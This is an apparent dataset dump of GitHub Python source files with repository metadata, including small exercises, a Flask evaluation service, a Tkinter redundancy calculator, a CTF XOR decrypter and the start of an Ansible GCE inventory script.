blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 2 616 | content_id stringlengths 40 40 | detected_licenses listlengths 0 69 | license_type stringclasses 2
values | repo_name stringlengths 5 118 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringlengths 4 63 | visit_date timestamp[us] | revision_date timestamp[us] | committer_date timestamp[us] | github_id int64 2.91k 686M ⌀ | star_events_count int64 0 209k | fork_events_count int64 0 110k | gha_license_id stringclasses 23
values | gha_event_created_at timestamp[us] | gha_created_at timestamp[us] | gha_language stringclasses 220
values | src_encoding stringclasses 30
values | language stringclasses 1
value | is_vendor bool 2
classes | is_generated bool 2
classes | length_bytes int64 2 10.3M | extension stringclasses 257
values | content stringlengths 2 10.3M | authors listlengths 1 1 | author_id stringlengths 0 212 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
c9ecd35d616ef88ccc7f420415f08dd4ddf41e39 | f245ab2ecf1e0fbf8278e2a23b3835c8076d6afe | /Python/Databases & Python Drill - Py2.7/Drill2.py | 0f73bdfb2353faf20d2d8dcbe20824005f9c0a8f | [] | no_license | gordonmannen/The-Tech-Academy-Course-Work | 6bb6f799d9e0b8572b82c30fa3d2f928afc77bf5 | 685f336601064efa2f08ed6690ec876931d2e4b7 | refs/heads/master | 2021-01-17T13:23:24.588154 | 2016-07-31T04:42:24 | 2016-07-31T04:42:24 | 56,191,902 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 692 | py | import sqlite3
# get person data from user and insert into a tuple
firstName=raw_input("Enter your first name:")
lastName=raw_input("Enter your last name:")
age=int(raw_input("Enter your age:"))
personData=(firstName,lastName,age)
# execute insert statement for supplied person data
with sqlite3.connect('test_database.db')as connection:
c=connection.cursor()
c.execute("INSERT INTO People VALUES(?,?,?)",personData)
# If you just wanted to update a particular detail for a person
# c.execute("UPDATE People SET Age=?WHERE FirstName=? AND LastName?",
# (45,'Luigi','Vercotti'))
c.execute("UPDATE People SET Age=? WHERE FirstName=? AND LastName=?", (45,'Luigi','Vercotti'))
| [
"gordon.mannen@yahoo.com"
] | gordon.mannen@yahoo.com |
e4766238d4ec25a4e788d84ab3736928a41ee592 | 896ed66a7017baf5b5fa9bbfd5be874692199190 | /inctf/forensics/LOGarithm/dec.py | 6ac81eb1816ecc621597f64560884c170e15192c | [] | no_license | ayrustogaru/CTF-writeups | af552ecea69c2305f9bd409c5076c93b6665521c | 03748b8c7f923fc1f7b7552cc09390a4eedb04a7 | refs/heads/master | 2022-12-08T06:09:44.000084 | 2020-08-17T16:36:52 | 2020-08-17T16:36:52 | 286,497,790 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,128 | py | #dec.py - A decrypter for the LOGarithm challenge
key = "UXpwY1VIbDBhRzl1TWpkY08wTTZYRkI1ZEdodmJqSTNYRk5qY21sd2RITTdRenBjVjJsdVpHOTNjMXh6ZVhOMFpXMHpNanRET2x4WAphVzVrYjNkek8wTTZYRmRwYm1SdmQzTmNVM2x6ZEdWdE16SmNWMkpsYlR0RE9seFhhVzVrYjNkelhGTjVjM1JsYlRNeVhGZHBibVJ2CmQzTlFiM2RsY2xOb1pXeHNYSFl4TGpCY08wTTZYRkJ5YjJkeVlXMGdSbWxzWlhNZ0tIZzROaWxjVG0xaGNDNURUMDA3TGtWWVJUc3UKUWtGVU95NURUVVE3TGxaQ1V6c3VWa0pGT3k1S1V6c3VTbE5GT3k1WFUwWTdMbGRUU0RzdVRWTkQK"
cipher = "PXgRVzcRMWkNZGIccglMH3QwUAR5XxgQdDh6PHJFaVJ6KkQCRAVqGHMfKyB8GEUQOlcRF0RTcj90MUR8RSUnE3gZOhIHM1A7bzFuCW0qSFN6IkgEKD9eKz0pEytBCHIpdFNYU3cKFRF4CSYTOg9uAkUFGBR0IHo/ciY3DnceWToCGXEBdANuZW1EWAV6N0QcATwfRTsEKCNtNFA4PBV8QzosXwdFEkgadjEzC3cZJgIDGEgSdBl2XW16Lwp3HzonAyJIGHoDJxBMJSJbJRlxKXQcZl1tX3I4PEtWPApYFixFF248cw0JTXo0GCo/RBgodDl6bXJaan48E2QYDT8KLG0LRCBCHB0DeR8AJzxEVDR6MTc2TzILCT5nUVgPZylkIXVyIW03YR10IFQ4dzlqMkNfdS51eVQkdjoZWG49cjx2HSBKejQIADJUdlJDUnYhQVVQaXR4Dkh9QiZXAFZ2J0IgFSR0QUtUdzJ1PDItSj4SJjEwdVZyFkQ3cjB0IDQy"
cipher = cipher.decode('base64')
l = len(key)
msg = ""
for i in range(0,len(cipher)):
msg += chr(ord(cipher[i]) ^ ord(key[i%l]))
print(msg)
| [
"noreply@github.com"
] | ayrustogaru.noreply@github.com |
4e404b4c200a4b0a221a3538e8f15c212981517e | f00c8395790dca63dbbcc2fac4df39a00352c0bd | /venv/bin/django-admin.py | 52cf084b1072f56763ab153fcb77ecbcba289808 | [] | no_license | enasmohmed/Store | 2d524e2f45f758328603c476f62c1592b4154c8a | 66a8cecde29164bc0ef46b0ab95d77fd87a61fe3 | refs/heads/main | 2023-01-20T11:58:43.092800 | 2020-11-28T15:42:09 | 2020-11-28T15:42:09 | 310,835,465 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 688 | py | #!/home/enas/Desktop/Django coretabs/venv/bin/python3
# When the django-admin.py deprecation ends, remove this script.
import warnings
from django.core import management
try:
from django.utils.deprecation import RemovedInDjango40Warning
except ImportError:
raise ImportError(
'django-admin.py was deprecated in Django 3.1 and removed in Django '
'4.0. Please manually remove this script from your virtual environment '
'and use django-admin instead.'
)
if __name__ == "__main__":
warnings.warn(
'django-admin.py is deprecated in favor of django-admin.',
RemovedInDjango40Warning,
)
management.execute_from_command_line()
| [
"enasm2477@gmail.com"
] | enasm2477@gmail.com |
81180b489da3bf91c69747e9b812d91a91911c9a | d131ace9edae9c6b2f6c69a3901609feffddafeb | /testing_credit_cards.py | a2f2e23b4d5eab244d000edc7de6c2d8060fa3d3 | [] | no_license | lateemaspencer/grokking-algorithm | 8acaf55c83de09f105f5fd047d812c4e5b57e4b2 | 3b654cafc2ef2bdb9be955f22d2de1939a8897d5 | refs/heads/master | 2021-01-12T00:52:08.080319 | 2017-01-19T22:28:51 | 2017-01-19T22:28:51 | 78,308,565 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 441 | py | from CreditCard import CreditCard
wallet = CreditCard('Lateema Spencer', 'California Savings', '5391 0375 9387 5309', 100)
print('Customer =', wallet.get_customer())
print('Bank =', wallet.get_bank())
print('Account =', wallet.get_account())
print('Limit =', wallet.get_limit())
print('Balance =', wallet.get_balance())
while wallet.get_balance() > 100:
wallet.make_payment(100)
print('New Balance =', wallet.get_balance())
print()
| [
"spencer.lateema@gmail.com"
] | spencer.lateema@gmail.com |
7995fc582146c2158eaa992be2a9ef6467415529 | f3b233e5053e28fa95c549017bd75a30456eb50c | /mcl1_input/L26/26-62_MD_NVT_rerun/set_1ns_equi_1.py | a035e758dac2d227d5ce00130a2c5ba6805a9fa2 | [] | no_license | AnguseZhang/Input_TI | ddf2ed40ff1c0aa24eea3275b83d4d405b50b820 | 50ada0833890be9e261c967d00948f998313cb60 | refs/heads/master | 2021-05-25T15:02:38.858785 | 2020-02-18T16:57:04 | 2020-02-18T16:57:04 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 925 | py | import os
dir = '/mnt/scratch/songlin3/run/mcl1/L26/MD_NVT_rerun/ti_one-step/26_62/'
filesdir = dir + 'files/'
temp_equiin = filesdir + 'temp_equi_1.in'
temp_pbs = filesdir + 'temp_1ns_equi_1.pbs'
lambd = [ 0.00922, 0.04794, 0.11505, 0.20634, 0.31608, 0.43738, 0.56262, 0.68392, 0.79366, 0.88495, 0.95206, 0.99078]
for j in lambd:
os.system("rm -r %6.5f" %(j))
os.system("mkdir %6.5f" %(j))
os.chdir("%6.5f" %(j))
os.system("rm *")
workdir = dir + "%6.5f" %(j) + '/'
#equiin
eqin = workdir + "%6.5f_equi_1.in" %(j)
os.system("cp %s %s" %(temp_equiin, eqin))
os.system("sed -i 's/XXX/%6.5f/g' %s" %(j, eqin))
#PBS
pbs = workdir + "%6.5f_1ns_equi_1.pbs" %(j)
os.system("cp %s %s" %(temp_pbs, pbs))
os.system("sed -i 's/XXX/%6.5f/g' %s" %(j, pbs))
#top
os.system("cp ../26-62_merged.prmtop .")
os.system("cp ../0.5_equi_0.rst .")
#submit pbs
os.system("qsub %s" %(pbs))
os.chdir(dir)
| [
"songlin3@msu.edu"
] | songlin3@msu.edu |
1dc650adae49d3a7f479a9ce4b8ad82b9fe7da99 | f6c9f71f8850d9db28f4de25307f5b9f2c81523c | /0x11-python-network_1/0-hbtn_status.py | 3e978c5b1848abb25b3358b61a15b1fe98adc277 | [] | no_license | RaudoR/holbertonschool-higher_level_programming | 382c527718f84920c9de8a527cbacb224a8886ca | 460750c7a8fa4e01609bd6964d993653a94a5805 | refs/heads/master | 2020-09-29T03:52:07.953201 | 2020-05-29T18:20:29 | 2020-05-29T18:20:29 | 226,943,450 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 438 | py | #!/usr/bin/python3
'''script to fetch the url https://intranet.hbtn.io/status'''
import urllib.request
if __name__ == "__main__":
with urllib.request.urlopen('https://intranet.hbtn.io/status') as response:
html = response.read()
print("Body response:")
print("\t- type: {}".format(type(html)))
print("\t- content: {}".format(html))
print("\t- utf8 content: {}".format(html.decode("utf-8")))
| [
"rivaspaulino@outlook.com"
] | rivaspaulino@outlook.com |
50e9805b4c7342f69df26383d629e99793f89bc5 | f1d9917f6a26d71650fce36c9d5bb6cc27ba4571 | /setup.py | 22b5ac7ceacfe30e8796ea35a10812e78d5ab652 | [
"MIT"
] | permissive | arteria-project/arteria-bcl2fastq | 029caa20ba1deeb8f9f0a01429f6d416623245ae | afb1332c016d7af99cb710d3c6f4fe8f10775422 | refs/heads/master | 2023-07-12T21:14:48.265575 | 2023-07-03T08:48:58 | 2023-07-03T08:49:28 | 41,307,984 | 3 | 10 | MIT | 2023-05-05T11:37:55 | 2015-08-24T14:31:17 | Python | UTF-8 | Python | false | false | 779 | py | from setuptools import setup, find_packages
from bcl2fastq import __version__
import os
def read_file(fname):
return open(os.path.join(os.path.dirname(__file__), fname)).read()
try:
with open("requirements.txt", "r") as f:
install_requires = [x.strip() for x in f.readlines()]
except IOError:
install_requires = []
setup(
name='bcl2fastq',
version=__version__,
description="Micro-service for running bcl2fastq",
long_description=read_file('README.md'),
keywords='bioinformatics',
author='SNP&SEQ Technology Platform, Uppsala University',
packages=find_packages(),
include_package_data=True,
entry_points={
'console_scripts': ['bcl2fastq-ws = bcl2fastq.app:start']
},
#install_requires=install_requires
)
| [
"johan.dahlberg@medsci.uu.se"
] | johan.dahlberg@medsci.uu.se |
7f0b48fdccfb0e7bc771b9a9250292bfdef7a407 | 3b796677e4fcd78d919bbe6608bfed0438db6515 | /Solved in Python/LeetCode/linkedlist/reverseLinkedList.py | 3750853e60649f27f43e657fc2f9878c4108cc24 | [] | no_license | soniaarora/Algorithms-Practice | 764ec553fa7ac58dd8c7828b9af3742bfdff3f85 | d58d88487ff525dc234d98a4d4e47f3d38da97a8 | refs/heads/master | 2020-08-25T05:37:19.715088 | 2019-10-23T04:57:56 | 2019-10-23T04:57:56 | 216,968,917 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 921 | py | from sys import stdout
class Node:
def __init__(self,val):
self.val = val
self.next = None
class reverseLinkedList:
def __init__(self):
self.head = None
def push(self, new_data):
newNode = Node(new_data)
newNode.next = self.head
self.head = newNode
def reverselinkedList(self):
current = self.head
prev = None
while current != None:
nextValue = current.next
current.next = prev
prev = current
current = nextValue
self.head = prev
def printList(self):
temp = self.head
while temp is not None:
print(temp.val, end = "")
temp = temp.next
listt = reverseLinkedList()
listt.push(20)
listt.push(14)
listt.push(12)
listt.push(10)
listt.printList()
print("reverse list")
listt.reverselinkedList()
listt.printList()
| [
"soniaarora141@gmail.com"
] | soniaarora141@gmail.com |
7cd6dead451db1b118d909eb26b0f50214f90344 | 2cc0972b0e99d8861bb6a84400c7e2c57f9f6cfe | /src/service.py | d8cc0ed7ed27f0fa29071829d996e6c0e46106fd | [] | no_license | activesphere/progeval | 853482ef7294da1c54f58bb4afc02354cabbd5bd | 0fd3d711a790f8983d7db1d1bdc83a4a5f4d17df | refs/heads/master | 2021-01-11T17:36:09.123958 | 2017-01-30T11:15:59 | 2017-01-30T11:15:59 | 79,797,893 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,349 | py | from flask import Flask, request, Response
from flask_cors import CORS, cross_origin
from modules import rct
import random, json
# App Config
app = Flask(__name__)
CORS(app)
# Config Variables
app.config['MAX_CODE_LINES'] = 1000
# Response Wrappers
def _success_ok(data):
return Response(response=data, status=200, content_type='application/json')
def _success_accepted(message='Accepted'):
return Response(response=message, status=202, content_type='text/plain')
def _error_badrequest(message='Bad Request'):
return Response(response=message, status=400, content_type='text/plain')
def _error_internalerr(message='Internal Server Error'):
return Response(response=message, status=500, content_type='text/plain')
# Routes
@app.route('/evaluate', methods=['POST'])
def evaluate():
req_data = request.get_json(silent=True)
try:
code_array = req_data.pop('code')
lang = req_data.pop('lang')
problem_id = req_data.pop('problem_id')
except KeyError:
return _error_badrequest()
if len(code_array) > app.config.get('MAX_CODE_LINES'):
return _error_badrequest()
program_id = str(int(random.random()*10000000))
lang = lang.upper()
result = rct.run_at_scale(program_id, lang, code_array, problem_id)
return _success_ok(json.dumps({'result': result }))
| [
"omkar@activesphere.com"
] | omkar@activesphere.com |
e75057981a3bdeac7738d8a54a38c61bba6cfdeb | f4ed463c93dfc37875a12295bce3f3753aa667a6 | /btre/urls.py | a39da920c32c434b653b74762258313d515622d1 | [] | no_license | mcbyrnewpi/realtor-project | 675c59f50eae9bde654cf9fa23b7081e9504c71c | 420dc079173f8c4261e02e25c38ee85a02169852 | refs/heads/master | 2020-04-17T05:07:36.764569 | 2019-01-17T21:32:46 | 2019-01-17T21:32:46 | 166,264,176 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 161 | py | from django.contrib import admin
from django.urls import path, include
urlpatterns = [
path('', include('pages.urls')),
path('admin/', admin.site.urls),
]
| [
"mcbyrnewpi@yahoo.com"
] | mcbyrnewpi@yahoo.com |
310ba3efc4b50e2afd0630a3084758e3d9fb7876 | a73e85150f1bcf6caacb1ad0fde0abb4717faaf5 | /calc.py | 7a741d61a97a6e57a6e143659d055a17ee57d024 | [] | no_license | Stephan-Neo/Otnos-izb | 1898f524f2c43b7a177e742b11b578ea8f35e077 | c59dba063dd82e0864dc1e223a5479ca0173bca5 | refs/heads/main | 2023-09-01T14:27:02.417845 | 2021-10-14T08:16:17 | 2021-10-14T08:16:17 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,608 | py | # В программе есть проверка на ввод текста(выводит диологовое окно, если ничего не ввести), проверка на выбор языка
# (выводит диологовое окно, если не выбрать язык или выбрать другой)
# Выполнил: Казанцев Степан СМБ-101
from tkinter import *
from tkinter import filedialog as fd
from tkinter import messagebox
from math import log2
from webbrowser import open as op
from time import sleep
window: Tk = Tk()
window.geometry(f"1000x600+100+200")
window.resizable(width=False, height=False)
window.title("Калькулятор относительной избыточности")
window.iconbitmap("source/prev.ico")
window.config(bg="white")
rb_var = IntVar()
rb_var.set(0)
message = ''
language = ''
image_1 = PhotoImage(file="source/img_1.png")
image_2 = PhotoImage(file="source/img_2.png")
image_3 = PhotoImage(file="source/img_3.png")
image_4 = PhotoImage(file="source/img_4.png")
gt = PhotoImage(file="source/big_logo.png")
image_clear = PhotoImage(file="source/clear.png")
count_start_calculate = 0
alphabet_power = 0
probability_symbol = {}
entropy = 0
max_entropy = 0
relative_redundancy = 0
len_message = 0
def insertText():
file_name = fd.askopenfilename()
f = open(file_name)
string = f.read()
inputtxt.delete("1.0", "end")
inputtxt.insert(1.0, string)
f.close()
# check function
def check_language():
global language, alphabet_power, probability_symbol
if rb_var.get() == 2:
language = "ENGLISH"
alphabet_power = 26
probability_symbol = {
'a': 0,
'b': 0,
'c': 0,
'd': 0,
'e': 0,
'f': 0,
'g': 0,
'h': 0,
'i': 0,
'j': 0,
'k': 0,
'l': 0,
'm': 0,
'n': 0,
'o': 0,
'p': 0,
'q': 0,
'r': 0,
's': 0,
't': 0,
'u': 0,
'v': 0,
'w': 0,
'x': 0,
'y': 0,
'z': 0
}
elif rb_var.get() == 1:
language = "RUSSIA"
alphabet_power = 33
probability_symbol = {
'а': 0,
'б': 0,
'в': 0,
'г': 0,
'д': 0,
'е': 0,
'ё': 0,
'ж': 0,
'з': 0,
'и': 0,
'й': 0,
'к': 0,
'л': 0,
'м': 0,
'н': 0,
'о': 0,
'п': 0,
'р': 0,
'с': 0,
'т': 0,
'у': 0,
'ф': 0,
'х': 0,
'ц': 0,
'ч': 0,
'ш': 0,
'щ': 0,
'ъ': 0,
'ы': 0,
'ь': 0,
'э': 0,
'ю': 0,
'я': 0
}
def check_warning():
if inputtxt.get(1.0, 1.1) == '' or inputtxt.get(1.0, 1.1) == ' ':
messagebox.showerror('Ошибка', 'Вы не ввели текст!')
elif language == '':
messagebox.showerror('Ошибка', 'Вы не выбрали язык!')
else:
return True
# draw function
def draw_radiobutton():
Radiobutton(text="Русский", variable=rb_var, activebackground="purple", value=1,
font=("Helvetica", 9, "bold"), relief="groove", bg="cyan", fg="black", bd=5, cursor="hand2").place(
x=760, y=480)
Radiobutton(text="Английский", variable=rb_var, activebackground="purple", value=2, font=("Helvetica", 9, "bold"),
relief="groove", bg="cyan", fg="black", bd=5, cursor="hand2").place(x=850, y=480)
def draw_window_right():
global inputtxt
Label(window, text="Введите текст", font=("Helvetica", 20, "bold"), bg="white").place(x=650, y=10)
inputtxt = Text(window, height=15, width=40, bg="light cyan", pady=5, padx=5, bd=5, font=("Helvetica", 14), spacing2=5, spacing1=5, selectbackground="purple")
inputtxt.place(x=510, y=50)
b_open = Button(text="Выбрать", activebackground="purple", command=insertText, font=("Helvetica", 9, "bold"), relief="groove", bg="cyan", fg="black", bd=5, cursor="hand2")
b_open.place(x=510, y=480)
draw_radiobutton()
b_start = Button(text="Рассчитать", width=37, command=start_calculate, activebackground="purple", font=("Helvetica", 14, "bold"), relief="groove", bg="cyan", fg="black", bd=5, cursor="hand2")
b_start.place(x=510, y=525)
def draw_window_left():
time_sleep = 0.5
window.update()
sleep(time_sleep)
img_1 = Label(window, image=image_1, bg="white")
img_1.place(x=0, y=45)
window.update()
sleep(time_sleep)
img_2 = Label(window, image=image_2, bg="white")
img_2.place(x=5, y=165)
Label(window, text=round(entropy, 2), fg='cyan', font=("Helvetica", 18, "bold"), bg="white").place(x=350, y=180)
window.update()
sleep(time_sleep)
img_3 = Label(window, image=image_3, bg="white")
img_3.place(x=8, y=300)
Label(window, text=round(max_entropy, 2), fg='cyan', font=("Helvetica", 18, "bold"), bg="white").place(x=350, y=305)
window.update()
sleep(time_sleep)
img_4 = Label(window, image=image_4, bg="white")
img_4.place(x=8, y=420)
Label(window, text=round(relative_redundancy, 10), fg='cyan', font=("Helvetica", 18, "bold"), bg="white").place(x=280, y=423)
window.update()
sleep(time_sleep)
link = Button(activebackground="white", command=open_site_gtsk, image=gt, font=("Helvetica", 14, "bold"), relief="raised", bg="white", fg="black", bd=0, cursor="hand2")
link.place(x=10, y=550)
def open_site_gtsk():
op('https://gtsk.pw', new=0, autoraise=True)
# calculate function
def start_calculate():
global message, count_start_calculate
count_start_calculate += 1
message = inputtxt.get(1.0, 'end').lower()
check_language()
if count_start_calculate > 1:
Label(window, image=image_clear, bg="white").place(x=0, y=0)
if check_warning():
try:
count_element()
calculate_probability()
calculate_entropy()
calculate_relative_redundancy()
if entropy != 0:
draw_window_left()
except ZeroDivisionError:
messagebox.showerror('Ошибка', 'Вы выбрали не тот язык!')
def count_element():
global len_message
len_message = 0
for i in probability_symbol:
len_message += message.count(i)
def calculate_probability():
for i in probability_symbol:
probability_symbol[i] = message.count(i) / len_message
def calculate_entropy():
global entropy, max_entropy
entropy = 0
max_entropy = 0
for i in probability_symbol:
if probability_symbol[i] != 0:
entropy += probability_symbol[i]*log2(1 / probability_symbol[i])
max_entropy = len_message*log2(alphabet_power)
def calculate_relative_redundancy():
global relative_redundancy, max_entropy, entropy
relative_redundancy = (max_entropy - entropy) / max_entropy
def main():
draw_window_right()
main()
window.mainloop()
| [
"noreply@github.com"
] | Stephan-Neo.noreply@github.com |
fee3d63104b3a5f16534c2d6178df494e2afea73 | 935b332d3e17033a5101af12b21872ca3de5aa75 | /ieml/dictionary/dictionary.py | d9d489b3b9b6ab332a200acc54e74ae52ce7b92d | [] | no_license | IEMLdev/ieml-dictionary | 7e7dedfa318022c392a3b75a5b713cbf21bb9df0 | 1622d98d283c322639602c38ac22dbf647ecdce6 | refs/heads/master | 2020-04-07T06:29:27.658416 | 2019-01-25T16:05:59 | 2019-01-25T16:05:59 | 158,137,631 | 2 | 2 | null | null | null | null | UTF-8 | Python | false | false | 7,887 | py | import hashlib
from typing import List, Dict
import dill
import sys
from ieml.constants import LANGUAGES, DICTIONARY_FOLDER
from ieml.dictionary.relation.relations import RelationsGraph
from ieml.dictionary.script import script
import numpy as np
from collections import namedtuple
import os
import yaml
from ieml.dictionary.table.table_structure import TableStructure
Translations = namedtuple('Translations', sorted(LANGUAGES))
Translations.__getitem__ = lambda self, item: self.__getattribute__(item) if item in LANGUAGES \
else tuple.__getitem__(self, item)
Comments = namedtuple('Comments', sorted(LANGUAGES))
Comments.__getitem__ = lambda self, item: self.__getattribute__(item) if item in LANGUAGES \
else tuple.__getitem__(self, item)
class FolderWatcherCache:
def __init__(self, folder: str, cache_folder: str):
"""
Cache that check if `folder` content has changed. Compute a hash of the files in the folder and
get pruned if the content of this folder change.
:param folder: the folder to watch
:param cache_folder: the folder to put the cache file
"""
self.folder = folder
self.cache_folder = os.path.abspath(cache_folder)
def update(self, obj) -> None:
"""
Update the cache content, remove old cache files from the cache directory.
:param obj: the object to pickle in the cache
:return: None
"""
for c in self._cache_candidates():
os.remove(c)
with open(self.cache_file, 'wb') as fp:
dill.dump(obj, fp)
def get(self) -> object:
"""
Unpickle and return the object stored in the cache file.
:return: the stored object
"""
with open(self.cache_file, 'rb') as fp:
return dill.load(fp)
def is_pruned(self) -> bool:
"""
Return True if the watched folder content has changed.
:return: if the folder content changed
"""
names = [p for p in self._cache_candidates()]
if len(names) != 1:
return True
return self.cache_file != names[0]
@property
def cache_file(self) -> str:
"""
:return: The cache file absolute path
"""
res = b""
for file in sorted(os.listdir(self.folder)):
with open(os.path.join(self.folder, file), 'rb') as fp:
res += file.encode('utf8') + b":" + fp.read()
return os.path.join(self.cache_folder, ".dictionary-cache.{}".format(hashlib.md5(res).hexdigest()))
def _cache_candidates(self) -> List[str]:
"""
Return all the cache files from the cache folder (the pruned and the current one)
:return: All the cache files from the cache folder
"""
return [os.path.join(self.cache_folder, n) for n in os.listdir(self.cache_folder) if n.startswith('.dictionary-cache.')]
def get_dictionary_files(folder:str=DICTIONARY_FOLDER):
return sorted(os.path.join(folder, f) for f in os.listdir(folder) if f.endswith('.yaml'))
class Dictionary:
@classmethod
def load(cls, folder:str=DICTIONARY_FOLDER, use_cache:bool=True, cache_folder:str=os.path.abspath('.')):
"""
Load a dictionary from a dictionary folder. The folder must contains a list of paradigms
:param folder: The folder
:param use_cache:
:param cache_folder:
:return:
"""
print("Dictionary.load: Reading dictionary at {}".format(folder), file=sys.stderr)
if use_cache:
cache = FolderWatcherCache(folder, cache_folder=cache_folder)
if not cache.is_pruned():
print("Dictionary.load: Reading cache at {}".format(cache.cache_file), file=sys.stderr)
return cache.get()
print("Dictionary.load: Dictionary files changed Recomputing cache.", file=sys.stderr)
scripts = []
translations = {'fr': {}, 'en': {}}
comments = {'fr': {}, 'en': {}}
def _add_metadatas(ieml, c):
translations['fr'][ieml] = c['translations']['fr'].strip()
translations['en'][ieml] = c['translations']['en'].strip()
if 'comments' in c:
if 'fr' in c['comments']: comments['fr'][ieml] = c['comments']['fr'].strip()
if 'en' in c['comments']: comments['en'][ieml] = c['comments']['en'].strip()
roots = []
inhibitions = {}
n_ss = 0
n_p = 0
for f in get_dictionary_files(folder):
with open(f) as fp:
d = yaml.load(fp)
try:
root = d['RootParadigm']['ieml']
inhibitions[root] = d['RootParadigm']['inhibitions']
roots.append(root)
_add_metadatas(root, d['RootParadigm'])
scripts.append(root)
if 'Semes' in d and d['Semes']:
for c in d['Semes']:
n_ss += 1
scripts.append(c['ieml'])
_add_metadatas(c['ieml'], c)
if 'Paradigms' in d and d['Paradigms']:
for c in d['Paradigms']:
n_p += 1
scripts.append(c['ieml'])
_add_metadatas(c['ieml'], c)
except (KeyError, TypeError):
raise ValueError("'{}' is not a valid dictionary yaml file".format(f))
print("Dictionary.load: Read {} root paradigms, {} paradigms and {} semes".format(len(roots), n_p, n_ss), file=sys.stderr)
print("Dictionary.load: Computing table structure and relations ...", file=sys.stderr)
dictionary = cls(scripts=scripts,
translations=translations,
root_paradigms=roots,
inhibitions=inhibitions,
comments=comments)
print("Dictionary.load: Computing table structure and relations", file=sys.stderr)
if use_cache:
print("Dictionary.load: Updating cache at {}".format(cache.cache_file), file=sys.stderr)
cache.update(dictionary)
return dictionary
def __init__(self,
scripts: List[str],
root_paradigms: List[str],
translations: Dict[str, Dict[str, str]],
inhibitions: Dict[str, List[str]],
comments: Dict[str, Dict[str, str]]):
self.scripts = np.array(sorted(script(s) for s in scripts))
self.index = {e: i for i, e in enumerate(self.scripts)}
# list of root paradigms
self.roots_idx = np.zeros((len(self.scripts),), dtype=int)
self.roots_idx[[self.index[r] for r in root_paradigms]] = 1
# scripts to translations
self.translations = {s: Translations(fr=translations['fr'][s], en=translations['en'][s]) for s in self.scripts}
# scripts to translations
self.comments = {s: Comments(fr=comments['fr'][s] if s in comments['fr'] else '',
en=comments['en'][s] if s in comments['en'] else '') for s in self.scripts}
# map of root paradigm script -> inhibitions list values
self._inhibitions = inhibitions
# self.tables = TableStructure
self.tables = TableStructure(self.scripts, self.roots_idx)
self.relations = RelationsGraph(dictionary=self)
def __len__(self):
return self.scripts.__len__()
# def one_hot(self, s):
# return np.eye(len(self), dtype=int)[self.index[s]]
def __getitem__(self, item):
return self.scripts[self.index[script(item)]]
def __contains__(self, item):
return item in self.index
if __name__ == '__main__':
d = Dictionary.load()
for s in d.scripts:
print("en", d.translations[s]['en']) | [
"louis.vanbeurden@gmail.com"
] | louis.vanbeurden@gmail.com |
27ad7540d3a8c2ba45524d727a0a1bdf448d9b89 | 51a5ea9129b5df011667ea0d81d09b3963cdeedb | /inventory/gce.py | 7f3e1eaac270234bfd35a3854491a05ffa3631b0 | [] | no_license | lpereir4/mStakx | 227d746afa52c1086e78360c33891a3b84d2e75f | 415d0fe542a6b86e3a02699485b77e7519629213 | refs/heads/master | 2020-06-22T16:03:45.048666 | 2019-08-12T14:08:39 | 2019-08-12T14:08:39 | 197,742,173 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 19,274 | py | #!/usr/bin/env python
# Copyright: (c) 2013, Google Inc.
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
'''
GCE external inventory script
=================================
Generates inventory that Ansible can understand by making API requests
Google Compute Engine via the libcloud library. Full install/configuration
instructions for the gce* modules can be found in the comments of
ansible/test/gce_tests.py.
When run against a specific host, this script returns the following variables
based on the data obtained from the libcloud Node object:
- gce_uuid
- gce_id
- gce_image
- gce_machine_type
- gce_private_ip
- gce_public_ip
- gce_name
- gce_description
- gce_status
- gce_zone
- gce_tags
- gce_metadata
- gce_network
- gce_subnetwork
When run in --list mode, instances are grouped by the following categories:
- zone:
zone group name examples are us-central1-b, europe-west1-a, etc.
- instance tags:
An entry is created for each tag. For example, if you have two instances
with a common tag called 'foo', they will both be grouped together under
the 'tag_foo' name.
- network name:
the name of the network is appended to 'network_' (e.g. the 'default'
network will result in a group named 'network_default')
- machine type
types follow a pattern like n1-standard-4, g1-small, etc.
- running status:
group name prefixed with 'status_' (e.g. status_running, status_stopped,..)
- image:
when using an ephemeral/scratch disk, this will be set to the image name
used when creating the instance (e.g. debian-7-wheezy-v20130816). when
your instance was created with a root persistent disk it will be set to
'persistent_disk' since there is no current way to determine the image.
Examples:
Execute uname on all instances in the us-central1-a zone
$ ansible -i gce.py us-central1-a -m shell -a "/bin/uname -a"
Use the GCE inventory script to print out instance specific information
$ contrib/inventory/gce.py --host my_instance
Author: Eric Johnson <erjohnso@google.com>
Contributors: Matt Hite <mhite@hotmail.com>, Tom Melendez <supertom@google.com>,
John Roach <johnroach1985@gmail.com>
Version: 0.0.4
'''
try:
import pkg_resources
except ImportError:
# Use pkg_resources to find the correct versions of libraries and set
# sys.path appropriately when there are multiversion installs. We don't
# fail here as there is code that better expresses the errors where the
# library is used.
pass
USER_AGENT_PRODUCT = "Ansible-gce_inventory_plugin"
USER_AGENT_VERSION = "v2"
import sys
import os
import argparse
from time import time
from ansible.module_utils.six.moves import configparser
import logging
logging.getLogger('libcloud.common.google').addHandler(logging.NullHandler())
import json
try:
from libcloud.compute.types import Provider
from libcloud.compute.providers import get_driver
_ = Provider.GCE
except Exception:
sys.exit("GCE inventory script requires libcloud >= 0.13")
class CloudInventoryCache(object):
def __init__(self, cache_name='ansible-cloud-cache', cache_path='/tmp',
cache_max_age=300):
cache_dir = os.path.expanduser(cache_path)
if not os.path.exists(cache_dir):
os.makedirs(cache_dir)
self.cache_path_cache = os.path.join(cache_dir, cache_name)
self.cache_max_age = cache_max_age
def is_valid(self, max_age=None):
''' Determines if the cache files have expired, or if it is still valid '''
